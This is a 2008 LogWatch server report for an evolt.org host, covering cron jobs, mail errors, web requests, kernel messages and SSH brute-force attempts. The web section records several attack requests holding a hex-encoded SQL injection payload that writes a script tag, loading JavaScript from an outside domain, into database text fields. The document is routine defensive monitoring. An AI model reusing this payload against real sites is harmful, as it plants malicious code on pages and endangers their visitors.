[Sysadmin] LogWatch for tempest
root
root at tempest.evolt.org
Sat Aug 23 06:25:55 CDT 2008
################### LogWatch 5.2.2 (06/23/04) ####################
Processing Initiated: Sat Aug 23 06:25:27 2008
Date Range Processed: yesterday
Detail Level of Output: 10
Logfiles for Host: tempest
################################################################
--------------------- Cron Begin ------------------------
Commands Run:
User dkaufman:
/bin/date > $HOME/date.txt: 1440 Time(s)
User dmah:
/home/dmah/bin/article_reminder.pl: 1 Time(s)
/home/dmah/bin/comment_reminder.pl: 1 Time(s)
User mailman:
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/checkdbs: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/disabled: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/gate_news: 288 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/nightly_gzip: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/senddigests: 1 Time(s)
User root:
run-parts --report /etc/cron.hourly: 24 Time(s)
[ -d /var/lib/php4 ] && find /var/lib/php4/ -type f -cmin +$(/usr/lib/php4/maxlifetime) -print0 | xargs -r -0 rm: 48 Time(s)
/store/host/browsers.evolt.org/mkarchivesize: 1 Time(s)
/usr/bin/freshclam --quiet -l /var/log/clam-update.log: 1 Time(s)
/usr/local/bin/planetupdate 1>/dev/null 2>&1: 24 Time(s)
/usr/sbin/ntpdate -su us.pool.ntp.org us.pool.ntp.org: 1 Time(s)
/var/qmail/bin/qmailstats 1>/dev/null 2>/dev/null: 1 Time(s)
if [ -x /usr/bin/vnstat ] && [ `ls /var/lib/vnstat/ | wc -l` -ge 1 ]; then /usr/bin/vnstat -u; fi: 288 Time(s)
test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily: 1 Time(s)
test -x /usr/sbin/cron-apt && /usr/sbin/cron-apt: 1 Time(s)
wget -O - -q http://evolt.org/cron.php: 72 Time(s)
User www-data:
[ -x /usr/lib/cgi-bin/awstats.pl -a -f /etc/awstats/awstats.conf -a -r /var/log/apache/access.log ] && /usr/lib/cgi-bin/awstats.pl -config=awstats -update >/dev/null: 144 Time(s)
---------------------- Cron End -------------------------
--------------------- EXIM Begin ------------------------
--- Messages history ---
-MsgID: 1KWUmg-0002SG-00:
2008-08-22 06:26:29 <= root at tempest.evolt.org U=root P=local S=37340
2008-08-22 06:29:41 lists.evolt.org [67.19.100.195]: Connection timed out
2008-08-22 06:29:41 == sysadmin at lists.evolt.org T=local_smtp defer (110): Connection timed out
2008-08-22 06:29:41 failed to open DB file /var/spool/exim/db/retry: File exists
-MsgID: 1KWUml-0002T0-00:
2008-08-22 06:27:00 <= root at tempest.evolt.org U=root P=local S=325151
2008-08-22 06:30:10 lists.evolt.org [67.19.100.195]: Connection timed out
2008-08-22 06:30:10 == root at lists.evolt.org <root at tempest.evolt.org> T=local_smtp defer (110): Connection timed out
2008-08-22 06:30:10 failed to open DB file /var/spool/exim/db/retry: File exists
-MsgID: 1KWb15-0002h1-00:
2008-08-22 13:10:12 <= root at tempest.evolt.org U=root P=local S=837
2008-08-22 13:13:23 lists.evolt.org [67.19.100.195]: Connection timed out
2008-08-22 13:13:23 == root at lists.evolt.org <root at tempest.evolt.org> T=local_smtp defer (110): Connection timed out
2008-08-22 13:13:23 failed to open DB file /var/spool/exim/db/retry: File exists
0 messages delivered immediately to 0 total recipients
---------------------- EXIM End -------------------------
--------------------- httpd Begin ------------------------
14.64 MB transfered in 1092 responses (1xx 0, 2xx 611, 3xx 58, 4xx 423, 5xx 0)
47 Images (0.01 MB),
8 Documents (0.00 MB),
2 Archives (0.00 MB),
800 Content pages (14.47 MB),
73 Program source files (0.11 MB),
162 Other (0.05 MB)
Attempts to use 1 known hacks were logged 1 time(s)
phpmyadmin by
65.55.210.21 1 time(s)
A total of 1 sites probed the server
65.55.210.21
A total of 44 unidentified 'other' records logged
GET /turkif HTTP/1.0 with response code(s) 1 404 responses
GET /tweak HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/evolt-logo.ai?annotate=1.1&hideattic=0;DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 400 responses
GET /PHP-Login-System-with-Admin-Features/ll tell you. If you look in constants.php you HTTP/1.1 with response code(s) 1 400 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating03.gif?hideattic=0&sortby=date&only_with_tag=weo_theme-4-5 HTTP/1.1 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/rss10.gif?annotate=1.1&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/evolt-logo.ai?annotate=1.1&hideattic=0';DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 400 responses
GET /liorean HTTP/1.1 with response code(s) 1 404 responses
HEAD /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /jeff/code/index.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating01.gif?hideattic=0&r1=1.2&rev=1.2&only_with_tag=weo_theme-4-5&sortby=date&view=log HTTP/1.1 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evolt-logo.ai?view=markup&sortby=rev&only_with_tag=MAIN;DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 400 responses
GET /signup.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating07.gif?view=markup&sortby=date&only_with_tag=weo_theme-4-5 HTTP/1.1 with response code(s) 1 200 responses
GET /PHP-Login-System-with-Admin-Features/, make sure your database name and password information is specified correctly in constants.php. If you still can HTTP/1.1 with response code(s) 1 400 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/rss10.gif?only_with_tag=weo_theme-4-5&sortby=author&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
GET /seb HTTP/1.0 with response code(s) 1 404 responses
GET /StOne HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/dhtml_form_rollover/index.cfm HTTP/1.1 with response code(s) 2 404 responses
GET /jeff/code/dhtml_form_rollover/index.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/gold-cube.png?view=log&rev=1.3&sortby=author&r1=1.2 HTTP/1.1 with response code(s) 1 200 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/35 HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evolt-logo.ai?view=markup&sortby=rev&only_with_tag=MAIN';DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 400 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/greencube.gif?rev=1.1 HTTP/1.1 with response code(s) 1 200 responses
GET /rss/articles.rss HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/link_accessibility_usability.cfm HTTP/1.0 with response code(s) 1 404 responses
- with response code(s) 116 408 responses
GET /garrett/site/books/factual HTTP/1.0 with response code(s) 1 404 responses
GET /mwarden/weblog HTTP/1.0 with response code(s) 1 404 responses
GET /mantruc/blog HTTP/1.1 with response code(s) 2 404 responses
GET /node/28652?;DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 400 responses
GET /jeff/code/preload_n_rollover HTTP/1.1 with response code(s) 1 404 responses
GET /jswiders/%5D. HTTP/1.1 with response code(s) 1 404 responses
GET /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /luminosity/thoughts/thoughts.rss HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/6alt_rating03.gif?view=markup&rev=1.1&sortby=file&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
GET /luminosity HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-0.png?view=markup&rev=1.1&sortby=author&only_with_tag=HEAD HTTP/1.1 with response code(s) 1 200 responses
GET /dwarfsoft/dwarfsoft/CAEKMETAL.f00 HTTP/1.1 with response code(s) 1 404 responses
GET /jeff/code/checkbox_check_all.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/rss10.gif?hideattic=1&sortby=log&only_with_tag=MAIN HTTP/1.1 with response code(s) 1 200 responses
GET /node/28652?';DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 with response code(s) 1 408 responses
GET /garrett/site/books/factual HTTP/1.1 with response code(s) 1 404 responses
GET /turkif HTTP/1.1 with response code(s) 1 404 responses
A total of 11 ROBOTS were logged
Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) 6 time(s)
WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU) 1 time(s)
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 3 time(s)
Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) 1 time(s)
msnbot-media/1.0 (+http://search.msn.com/msnbot.htm) 3 time(s)
Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/) 3 time(s)
ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler at alexa.com) 1 time(s)
msnbot/1.1 (+http://search.msn.com/msnbot.htm) 21 time(s)
PDFBot (crawler at pdfind.com) 2 time(s)
Baiduspider+(+http://www.baidu.com/search/spider.htm) 1 time(s)
DoCoMo/2.0 P900i(c100;TB;W24H11) 1 time(s)
---------------------- httpd End -------------------------
--------------------- Kernel Begin ------------------------
1 Time(s): TCP: Treason uncloaked! Peer 195.240.198.33:53664/80 shrinks window 159291508:159297010. Repaired.
1 Time(s): TCP: Treason uncloaked! Peer 195.240.198.33:53665/80 shrinks window 163027671:163053580. Repaired.
1 Time(s): TCP: Treason uncloaked! Peer 217.42.240.237:64867/80 shrinks window 65125421:65129966. Repaired.
1 Time(s): UDP: bad checksum. From 12.96.160.108:53 to 67.19.100.194:7638 ulen 223
1 Time(s): UDP: bad checksum. From 12.96.160.115:53 to 67.19.100.194:36817 ulen 510
1 Time(s): UDP: short packet: 12.96.160.115:53 115/99 to 67.19.100.194:39497
1 Time(s): UDP: short packet: 12.96.160.115:53 127/111 to 67.19.100.194:34170
1 Time(s): UDP: short packet: 12.96.160.115:53 144/128 to 67.19.100.194:56357
1 Time(s): UDP: short packet: 12.96.160.115:53 145/129 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 147/131 to 67.19.100.194:43086
1 Time(s): UDP: short packet: 12.96.160.115:53 148/132 to 67.19.100.194:50533
1 Time(s): UDP: short packet: 12.96.160.115:53 150/134 to 67.19.100.194:51271
1 Time(s): UDP: short packet: 12.96.160.115:53 154/138 to 67.19.100.194:32952
1 Time(s): UDP: short packet: 12.96.160.115:53 158/142 to 67.19.100.194:15093
1 Time(s): UDP: short packet: 12.96.160.115:53 158/142 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 176/160 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 183/167 to 67.19.100.194:50420
1 Time(s): UDP: short packet: 12.96.160.115:53 185/169 to 67.19.100.194:51281
1 Time(s): UDP: short packet: 12.96.160.115:53 191/175 to 67.19.100.194:51065
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:35284
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:35584
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:39927
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:41423
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:48976
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:51137
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:52906
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:52973
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:53718
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:55601
1 Time(s): UDP: short packet: 12.96.160.115:53 240/224 to 67.19.100.194:43641
1 Time(s): UDP: short packet: 12.96.160.115:53 313/297 to 67.19.100.194:58318
1 Time(s): UDP: short packet: 12.96.160.115:53 315/299 to 67.19.100.194:37679
1 Time(s): UDP: short packet: 12.96.160.115:53 316/300 to 67.19.100.194:39918
1 Time(s): UDP: short packet: 12.96.160.115:53 446/430 to 67.19.100.194:46315
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:35035
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:52315
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:53111
1 Time(s): UDP: short packet: 12.96.160.115:53 535/519 to 67.19.100.194:55757
1 Time(s): device eth0 entered promiscuous mode
1 Time(s): device eth0 left promiscuous mode
12 Time(s): sending pkt_too_big (len[1480] pmtu[1464]) to self
6 Time(s): sending pkt_too_big (len[1500] pmtu[1492]) to self
47 Time(s): sending pkt_too_big (len[1500] pmtu[1496]) to self
---------------------- Kernel End -------------------------
--------------------- Named Begin ------------------------
Named started: 1 Time(s)
Named shutdown: 1 Time(s)
Loaded Zones:
0.in-addr.arpa/IN: 1 Time(s)
127.in-addr.arpa/IN: 1 Time(s)
255.in-addr.arpa/IN: 1 Time(s)
evolt.org/IN: 1 Time(s)
evolters.org/IN: 1 Time(s)
localhost/IN: 1 Time(s)
Can't add command channel:
127.0.0.1#953:
permission denied: 1 Time(s)
**Unmatched Entries**
binding TCP socket: address in use: 1 Time(s)
dns/org.evolters:35: file does not end with newline: 1 Time(s)
none:0: open: /etc/bind/rndc.key: permission denied: 1 Time(s)
---------------------- Named End -------------------------
--------------------- pam_unix Begin ------------------------
cron:
Sessions Opened:
dkaufman: 1440 Time(s)
root: 462 Time(s)
mailman: 292 Time(s)
www-data: 144 Time(s)
dmah: 2 Time(s)
sshd:
Authentication Failures:
unknown (211.144.151.111): 29 Time(s)
unknown (adsl-070-154-244-035.sip.pfn.bellsouth.net): 20 Time(s)
unknown (smtp.clickx3.com): 17 Time(s)
unknown (mail.elpen.gr): 13 Time(s)
unknown (125.77.106.246): 10 Time(s)
unknown (201.2.56.34): 6 Time(s)
unknown (88-149-158-50.vps.virtuo.it): 6 Time(s)
unknown (p5098e021.dip0.t-ipconnect.de): 6 Time(s)
unknown (121.210.120.93): 4 Time(s)
unknown (121.33.199.40): 4 Time(s)
unknown (200-170-141-134.static.ctbctelecom.com.br): 4 Time(s)
Invalid Users:
Unknown Account: 119 Time(s)
Sessions Opened:
dmah: 3 Time(s)
su:
Sessions Opened:
(uid=0) -> nobody: 1 Time(s)
dmah(uid=0) -> root: 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- sendmail Begin ------------------------
ERROR: Could not open /etc/mail/local-host-names
ERROR: Could not open /etc/mail/access
Message Size Distribution:
Range # Msgs KBytes
0 - 10k 0 0
10k - 20k 0 0
20k - 50k 0 0
50k - 100k 0 0
100k - 500k 0 0
500k - 1Mb 0 0
1Mb - 2Mb 0 0
2Mb - 5Mb 0 0
5Mb - 10Mb 0 0
10Mb+ 0 0
----------------------------------
TOTAL 0 0
---------------------- sendmail End -------------------------
--------------------- SSHD Begin ------------------------
Couldn't resolve these IPs:
201-2-56-34.pvoce300.ipd.brasiltelecom.net.br: 7 Time(s)
cpe-121-210-120-93.nsw.bigpond.net.au: 5 Time(s)
vps253.nalcro1.com: 116 Time(s)
Didn't receive an ident from these IPs:
189.43.21.244: 5 Time(s)
203.255.186.78: 4 Time(s)
220.114.252.36: 5 Time(s)
59.63.25.158: 5 Time(s)
60-250-89-30.HINET-IP.hinet.net (60.250.89.30): 5 Time(s)
88-149-158-50.vps.virtuo.it (88.149.158.50): 1 Time(s)
mx.emri.in (124.30.164.50): 5 Time(s)
Failed logins from these:
Schueler/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
Schueler/keyboard-interactive/pam from 121.33.199.40: 4 Time(s)
Schueler/keyboard-interactive/pam from 125.77.106.246: 5 Time(s)
Schueler/keyboard-interactive/pam from 200.170.141.134: 2 Time(s)
Schueler/keyboard-interactive/pam from 201.2.56.34: 5 Time(s)
Schueler/keyboard-interactive/pam from 211.144.151.111: 5 Time(s)
Schueler/keyboard-interactive/pam from 62.1.184.115: 9 Time(s)
Schueler/keyboard-interactive/pam from 70.154.244.35: 7 Time(s)
Schueler/keyboard-interactive/pam from 80.152.224.33: 2 Time(s)
Schueler/keyboard-interactive/pam from 88.149.158.50: 3 Time(s)
Schueler/keyboard-interactive/pam from 96.225.194.10: 5 Time(s)
Studentenclub/keyboard-interactive/pam from 125.77.106.246: 4 Time(s)
Studentenclub/keyboard-interactive/pam from 200.170.141.134: 1 Time(s)
Studentenclub/keyboard-interactive/pam from 201.2.56.34: 1 Time(s)
Studentenclub/keyboard-interactive/pam from 211.144.151.111: 5 Time(s)
Studentenclub/keyboard-interactive/pam from 62.1.184.115: 4 Time(s)
Studentenclub/keyboard-interactive/pam from 70.154.244.35: 7 Time(s)
Studentenclub/keyboard-interactive/pam from 80.152.224.33: 2 Time(s)
Studentenclub/keyboard-interactive/pam from 88.149.158.50: 3 Time(s)
Studentenclub/keyboard-interactive/pam from 96.225.194.10: 4 Time(s)
aaron/password from 124.30.164.50: 1 Time(s)
abel/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
abel/keyboard-interactive/pam from 125.77.106.246: 1 Time(s)
abel/keyboard-interactive/pam from 200.170.141.134: 1 Time(s)
abel/keyboard-interactive/pam from 211.144.151.111: 5 Time(s)
abel/keyboard-interactive/pam from 70.154.244.35: 2 Time(s)
abel/keyboard-interactive/pam from 80.152.224.33: 1 Time(s)
abel/keyboard-interactive/pam from 96.225.194.10: 4 Time(s)
abi/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
abi/keyboard-interactive/pam from 211.144.151.111: 4 Time(s)
abi/keyboard-interactive/pam from 70.154.244.35: 1 Time(s)
abi/keyboard-interactive/pam from 80.152.224.33: 1 Time(s)
abi/keyboard-interactive/pam from 96.225.194.10: 3 Time(s)
abraham/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
abraham/keyboard-interactive/pam from 211.144.151.111: 3 Time(s)
abraham/keyboard-interactive/pam from 70.154.244.35: 2 Time(s)
abraham/keyboard-interactive/pam from 96.225.194.10: 1 Time(s)
access/keyboard-interactive/pam from 211.144.151.111: 7 Time(s)
access/keyboard-interactive/pam from 70.154.244.35: 1 Time(s)
admin/password from 124.30.164.50: 1 Time(s)
admin/password from 220.114.252.36: 3 Time(s)
admin/password from 65.98.53.173: 55 Time(s)
alias/password from 59.63.25.158: 1 Time(s)
gt05/password from 124.30.164.50: 1 Time(s)
logic/password from 220.114.252.36: 3 Time(s)
recruit/password from 59.63.25.158: 4 Time(s)
root/password from 124.30.164.50: 1 Time(s)
root/password from 60.250.89.30: 30 Time(s)
root/password from 65.98.53.173: 57 Time(s)
rvadmin/password from 65.98.53.173: 4 Time(s)
sales/password from 59.63.25.158: 5 Time(s)
staff/password from 59.63.25.158: 5 Time(s)
stud/password from 124.30.164.50: 1 Time(s)
t1na/password from 220.114.252.36: 6 Time(s)
trash/password from 124.30.164.50: 1 Time(s)
william/password from 124.30.164.50: 1 Time(s)
Illegal users from these:
Schueler/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
Schueler/keyboard-interactive/pam from 121.33.199.40: 4 Time(s)
Schueler/keyboard-interactive/pam from 125.77.106.246: 5 Time(s)
Schueler/keyboard-interactive/pam from 200.170.141.134: 2 Time(s)
Schueler/keyboard-interactive/pam from 201.2.56.34: 5 Time(s)
Schueler/keyboard-interactive/pam from 211.144.151.111: 5 Time(s)
Schueler/keyboard-interactive/pam from 62.1.184.115: 9 Time(s)
Schueler/keyboard-interactive/pam from 70.154.244.35: 7 Time(s)
Schueler/keyboard-interactive/pam from 80.152.224.33: 2 Time(s)
Schueler/keyboard-interactive/pam from 88.149.158.50: 3 Time(s)
Schueler/keyboard-interactive/pam from 96.225.194.10: 5 Time(s)
Schueler/none from 121.210.120.93: 1 Time(s)
Schueler/none from 121.33.199.40: 4 Time(s)
Schueler/none from 125.77.106.246: 5 Time(s)
Schueler/none from 200.170.141.134: 2 Time(s)
Schueler/none from 201.2.56.34: 5 Time(s)
Schueler/none from 211.144.151.111: 5 Time(s)
Schueler/none from 62.1.184.115: 9 Time(s)
Schueler/none from 70.154.244.35: 7 Time(s)
Schueler/none from 80.152.224.33: 2 Time(s)
Schueler/none from 88.149.158.50: 3 Time(s)
Schueler/none from 96.225.194.10: 5 Time(s)
Studentenclub/keyboard-interactive/pam from 125.77.106.246: 4 Time(s)
Studentenclub/keyboard-interactive/pam from 200.170.141.134: 1 Time(s)
Studentenclub/keyboard-interactive/pam from 201.2.56.34: 1 Time(s)
Studentenclub/keyboard-interactive/pam from 211.144.151.111: 5 Time(s)
Studentenclub/keyboard-interactive/pam from 62.1.184.115: 4 Time(s)
Studentenclub/keyboard-interactive/pam from 70.154.244.35: 7 Time(s)
Studentenclub/keyboard-interactive/pam from 80.152.224.33: 2 Time(s)
Studentenclub/keyboard-interactive/pam from 88.149.158.50: 3 Time(s)
Studentenclub/keyboard-interactive/pam from 96.225.194.10: 4 Time(s)
Studentenclub/none from 121.210.120.93: 1 Time(s)
Studentenclub/none from 125.77.106.246: 4 Time(s)
Studentenclub/none from 200.170.141.134: 1 Time(s)
Studentenclub/none from 201.2.56.34: 2 Time(s)
Studentenclub/none from 211.144.151.111: 5 Time(s)
Studentenclub/none from 62.1.184.115: 4 Time(s)
Studentenclub/none from 70.154.244.35: 7 Time(s)
Studentenclub/none from 80.152.224.33: 2 Time(s)
Studentenclub/none from 88.149.158.50: 3 Time(s)
Studentenclub/none from 96.225.194.10: 4 Time(s)
aaron/none from 124.30.164.50: 1 Time(s)
aaron/password from 124.30.164.50: 1 Time(s)
abel/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
abel/keyboard-interactive/pam from 125.77.106.246: 1 Time(s)
abel/keyboard-interactive/pam from 200.170.141.134: 1 Time(s)
